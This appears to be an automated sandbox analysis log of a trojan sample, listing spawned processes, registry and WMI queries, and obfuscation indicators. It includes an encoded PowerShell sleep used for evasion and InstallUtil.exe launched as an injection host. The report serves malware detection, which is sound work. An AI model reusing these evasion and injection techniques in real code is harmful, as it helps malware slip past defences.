Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Virustotal: Detection: 28%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwckm2bh.1q1.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@1/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe String found in binary or memory: .aoskapplication/x-nokia-9000-communicator-add-on-software
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe String found in binary or memory: .help-application/x-helpfile
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static file information: File size 1575424 > 1048576
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x180000
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E9DF3 push esp; retn 0002h 0_2_050EA021
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E50DC push eax; ret 0_2_050E50E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030B6DEA push edx; ret 5_2_030B6DEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E3F08 pushfd ; ret 5_2_030E43F9
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs High entropy of concatenated method names: '.cctor', 'W0geRGAaPA', 'uspmmMmBiE', 'MG9mtRqDb3', 'QH0mR1EQ8l', 'rQZmPXqm5l', 'maTmkV0Dg1', 'IvvmsHGal6', 'WssmUtnmUl', '.ctor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
